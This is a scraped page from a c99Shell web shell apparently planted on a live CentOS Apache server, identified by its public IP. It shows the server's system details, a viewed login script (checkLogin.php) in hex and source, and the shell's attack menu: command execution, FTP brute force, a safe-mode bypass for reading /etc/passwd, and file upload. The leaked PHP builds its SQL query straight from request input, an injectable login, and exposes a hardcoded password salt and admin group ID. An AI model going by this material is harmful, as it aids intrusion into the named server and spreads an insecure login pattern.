110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reg-tools/api/ drwxr-xr-x Free 52.39 GB of 127.8 GB (40.99%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/api/ drwxr-xr-x
Free 52.39 GB of 127.8 GB (40.99%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: checkLogin.php (1.24 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/reg-tools/api/checkLogin.php
Size	1.24 KB
MD5	526b678af2e1a0422b58795ec118fdb3
Owner/Group	root/root
Perms	-rw-r--r--
Create time	14/09/2022 20:22:43
Access time	30/07/2024 14:14:50
MODIFY time	30/07/2022 22:14:39

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8

3C 3F 70 68 70 0D 0A 0D 0A 69 6E 63 6C 75 64 65 28 22 2E 2E 2F 69 6E 63
6C 75 64 65 2F 63 6C 61 73 73 2E 6D 79 73 71 6C 64 62 2E 70 68 70 22 29
3B 0D 0A 69 6E 63 6C 75 64 65 28 22 2E 2E 2F 69 6E 63 6C 75 64 65 2F 63
6F 6E 66 69 67 2E 69 6E 63 2E 70 68 70 22 29 3B 0D 0A 0D 0A 69 66 20 28
24 5F 52 45 51 55 45 53 54 5B 22 61 63 74 69 6F 6E 22 5D 20 3D 3D 20 22
6C 6F 67 69 6E 22 29 20 7B 0D 0A 0D 0A 20 20 20 20 24 70 61 73 73 77 64
20 3D 20 6D 64 35 28 22 4F 5D 4F 22 20 2E 20 24 5F 52 45 51 55 45 53 54
5B 22 70 61 73 73 22 5D 20 2E 20 22 4F 5B 4F 22 29 3B 0D 0A 0D 0A 20 20
20 20 2F 2F 24 73 71 6C 20 3D 20 22 53 45 4C 45 43 54 20 2A 20 46 52 4F
4D 20 75 6D 73 32 2E 75 6D 75 73 65 72 20 57 48 45 52 45 20 55 73 4C 6F
67 69 6E 20 3D 20 27 22 20 2E 20 24 5F 52 45 51 55 45 53 54 5B 22 75 73
65 72 22 5D 20 2E 20 22 27 20 41 4E 44 20 55 73 50 61 73 73 77 6F 72 64
20 3D 20 27 22 20 2E 20 24 70 61 73 73 77 64 20 2E 20 22 27 20 41 4E 44
20 55 73 41 63 74 69 76 65 20 3D 20 27 31 27 20 41 4E 44 20 55 73 41 64
6D 69 6E 20 3D 20 27 31 27 22 3B 0D 0A 20 20 20 20 24 73 71 6C 20 3D 20
22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 75 6D 73 32 2E 75 6D 75 73
65 72 20 75 75 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 4C 45 46 54 20
4A 4F 49 4E 20 75 6D 73 32 2E 75 6D 75 73 65 72 67 72 6F 75 70 20 75 75
67 20 4F 4E 20 75 75 67 2E 55 67 55 73 49 64 20 3D 20 75 75 2E 55 73 49
64 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 57 48 45 52 45 20 75 75 2E
55 73 4C 6F 67 69 6E 20 3D 20 27 22 20 2E 20 24 5F 52 45 51 55 45 53 54
5B 22 75 73 65 72 22 5D 20 2E 20 22 27 20 41 4E 44 20 75 75 2E 55 73 50
61 73 73 77 6F 72 64 20 3D 20 27 22 20 2E 20 24 70 61 73 73 77 64 20 2E
20 22 27 20 41 4E 44 20 75 75 2E 55 73 41 63 74 69 76 65 20 3D 20 27 31
27 20 41 4E 44 20 28 75 75 2E 55 73 41 64 6D 69 6E 20 3D 20 27 31 27 20
4F 52 20 75 75 67 2E 55 67 47 70 49 44 20 3D 20 27 37 30 30 37 30 27 29
22 3B 0D 0A 20 20 20 20 24 6C 69 6E 6B 2D 3E 71 75 65 72 79 28 24 73 71
6C 29 3B 0D 0A 20 20 20 20 2F 2F 24 64 61 74 61 20 3D 20 24 6C 69 6E 6B
2D 3E 67 65 74 6E 65 78 74 28 29 3B 0D 0A 20 20 20 20 24 70 65 72 6D 69
73 73 69 6F 6E 20 3D 20 30 3B 0D 0A 20 20 20 20 24 75 73 4E 61 6D 65 3B
0D 0A 20 20 20 20 24 75 73 4C 6F 67 69 6E 3B 0D 0A 0D 0A 20 20 20 20 69
66 20 28 24 6C 69 6E 6B 2D 3E 6E 75 6D 5F 72 6F 77 73 28 29 29 20 7B 0D
0A 20 20 20 20 20 20 20 20 77 68 69 6C 65 20 28 24 64 61 74 61 20 3D 20
24 6C 69 6E 6B 2D 3E 67 65 74 6E 65 78 74 28 29 29 20 7B 0D 0A 20 20 20
20 20 20 20 20 20 20 20 20 69 66 28 24 64 61 74 61 2D 3E 55 73 41 64 6D
69 6E 20 3D 3D 20 22 31 22 20 7C 7C 20 24 64 61 74 61 2D 3E 55 67 47 70
49 44 20 3D 3D 20 22 37 30 30 37 30 22 29 7B 0D 0A 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 24 70 65 72 6D 69 73 73 69 6F 6E 20 3D 20 31
3B 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 75 73 4E 61
6D 65 20 3D 20 24 64 61 74 61 2D 3E 55 73 4E 61 6D 65 3B 0D 0A 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 24 75 73 4C 6F 67 69 6E 20 3D 20
24 64 61 74 61 2D 3E 55 73 4C 6F 67 69 6E 3B 0D 0A 20 20 20 20 20 20 20
20 20 20 20 20 7D 0D 0A 20 20 20 20 20 20 20 20 7D 0D 0A 20 20 20 20 7D
0D 0A 0D 0A 20 20 20 20 69 66 20 28 24 70 65 72 6D 69 73 73 69 6F 6E 20
3D 3D 20 22 31 22 29 20 7B 0D 0A 20 20 20 20 20 20 20 20 24 5F 53 45 53
53 49 4F 4E 5B 22 69 73 4C 6F 67 69 6E 22 5D 20 3D 20 74 72 75 65 3B 0D
0A 20 20 20 20 20 20 20 20 24 5F 53 45 53 53 49 4F 4E 5B 22 55 73 4E 61
6D 65 22 5D 20 3D 20 24 75 73 4E 61 6D 65 3B 0D 0A 20 20 20 20 20 20 20
20 24 5F 53 45 53 53 49 4F 4E 5B 22 55 73 4C 6F 67 69 6E 22 5D 20 3D 20
24 75 73 4C 6F 67 69 6E 3B 0D 0A 20 20 20 20 20 20 20 20 65 63 68 6F 20
22 4C 6F 67 69 6E 20 73 75 63 63 65 73 73 22 3B 0D 0A 20 20 20 20 7D 20
65 6C 73 65 20 7B 0D 0A 20 20 20 20 20 20 20 20 65 63 68 6F 20 22 4C 6F
67 69 6E 20 66 61 69 6C 65 64 22 3B 0D 0A 20 20 20 20 7D 0D 0A 7D 0D 0A
3F 3E

<?php    include("../inc
lude/class.mysqldb.php")
;  include("../include/c
onfig.inc.php");    if (
$_REQUEST["action"] == "
login") {        $passwd
= md5("O]O" . $_REQUEST
["pass"] . "O[O");
  //$sql = "SELECT * FRO
M ums2.umuser WHERE UsLo
gin = '" . $_REQUEST["us
er"] . "' AND UsPassword
= '" . $passwd . "' AND
UsActive = '1' AND UsAd
min = '1'";      $sql =
"SELECT * FROM ums2.umus
er uu              LEFT
JOIN ums2.umusergroup uu
g ON uug.UgUsId = uu.UsI
d              WHERE uu.
UsLogin = '" . $_REQUEST
["user"] . "' AND uu.UsP
assword = '" . $passwd .
"' AND uu.UsActive = '1
' AND (uu.UsAdmin = '1'
OR uug.UgGpID = '70070')
";      $link->query($sq
l);      //$data = $link
->getnext();      $permi
ssion = 0;      $usName;
      $usLogin;        i
f ($link->num_rows()) {
         while ($data =
$link->getnext()) {
         if($data->UsAdm
in == "1" || $data->UgGp
ID == "70070"){
         $permission = 1
;                  $usNa
me = $data->UsName;
             $usLogin =
$data->UsLogin;
     }          }      }
        if ($permission
== "1") {          $_SES
SION["isLogin"] = true;
         $_SESSION["UsNa
me"] = $usName;
$_SESSION["UsLogin"] =
$usLogin;          echo
"Login success";      }
else {          echo "Lo
gin failed";      }  }
?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.013 ]--